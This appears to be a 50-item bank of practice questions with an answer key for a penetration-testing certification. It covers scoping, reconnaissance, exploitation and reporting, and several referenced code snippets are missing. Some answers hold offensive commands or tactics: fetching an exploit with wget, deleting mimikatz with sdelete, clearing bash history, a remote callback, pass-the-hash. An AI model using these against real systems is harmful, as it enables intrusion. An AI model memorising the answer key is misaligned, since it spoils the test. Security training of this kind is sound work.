1-50

Questions and Answers

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

• chmod u+x script.sh (correct)
• chmod u+e script.sh
• chmod o+e script.sh
• chmod o+x script.sh

A penetration tester gains access to a system and establishes persistence, and then run the following commands:

Which of the following actions is the tester MOST likely performing?

• Redirecting Bash history to /dev/null
• Making a copy of the user's Bash history to further enumeration
• Covering tracks by clearing the Bash history (correct)
• Making decoy files on the system to confuse incident responders

A compliance-based penetration test is primarily concerned with:

• obtaining PII from the protected network.
• bypassing protection on edge devices.
• determining the efficacy of a specific set of security standards. (correct)
• obtaining specific information from the protected network.

A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?

Understanding the tactics of a security intrusion can help disrupt them. (A)

Which of the following BEST describe the OWASP Top 10? (Choose two.)

The most critical risks of web applications (A), The risks defined in order of importance (C)

A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Edit the discovered file with one line of code for remote callback. (A)

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?

Whether sensitive client data is publicly accessible (A)

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution?

wget 10.10.51.50:9891/exploit (D)

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

Which of the following commands should the penetration tester run post-engagement?

rm -rf /tmp/apache (B)

Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Code context for instances of unsafe typecasting operations (D)

SIMULATION - You are a penetration tester reviewing a client's website through a web browser.

INSTRUCTIONS - Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate, source, or cookies. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Step 1 = Generate Certificate Signing Request Step 2 = Submit CSR to the CA - Step 3 = Remove certificate from the server Step 4 = Install re-issued certificate on the server

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal?

SET (C)

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

The existence of default passwords (D)

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

To remove tools from the server (C)

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

nmap 192.168.1.1-5 -PS22-25,80 (C)

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output?

This URI returned a server error. (D)

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following MOST likely describes what happened?

The planning process failed to ensure all teams were notified. (B)

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish?

Identify all the vulnerabilities in the environment. (B)

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees' numbers?

Web archive (A)

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

Run nmap with the --script vulners option set against the target. (C)

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive?

Perform a manual test on the server. (B)

A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the HIGHEST likelihood of success?

Performing spear phishing against employees by posing as senior management (D)

A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router. Which of the following is MOST vulnerable to a brute-force attack?

WPS (A)

A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

Determine active hosts on the network. (A)

A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

Remove the tester-created credentials. (D)

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?

Scapy (C)

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment?

Unknown environment testing (C)

The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a probable port scan alert in the organization's IDS?

Line 08 (D)

A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?

Testing restrictions (C)

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Which of the following is most important for the penetration tester to define FIRST?

Establish the threshold of risk to escalate to the client immediately. (B)

A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

iam_enum_permissions (A)

A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

Deconflict with the penetration tester. (C)

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance?

Shodan (B)

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?

User hashes sent over SMB (D)

A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

ProxyChains (B)

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

Reach out to the primary point of contact. (A)

A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?

Wireshark (B)

A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50 Nmap returned that all 65,535 ports were filtered Which of the following MOST likely occurred on the second scan?

A firewall or IPS blocked the scan. (A)

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to: ✑ Have a full TCP connection ✑ Send a hello payload ✑ Wait for a response ✑ Send a string of characters longer than 16 bytes Which of the following approaches would BEST support the objective?

Create a script in the Lua language and use it with NSE. (C)

Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:

devices may cause physical world effects. (D)

A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective?

nmap -sS -O 192.168.1.2/24 -T1 (D)

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier. Which of the following is the BEST action for the penetration tester to take?

Stop the assessment and inform the emergency contact. (C)

A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?

Baiting (C)

A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position. Which of the following actions, if performed, would be ethical within the scope of the assessment?

Exploiting a configuration weakness in the SQL database (A)

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server?

Utilize a pass-the-hash attack. (D)

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

SOW (C)

A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:

Which of the following tools would be BEST for the penetration tester to use to explore this site further?

WPScan (C)

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information?

Document the unprotected file repository as a finding in the penetration-testing report (D)

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

#! (D)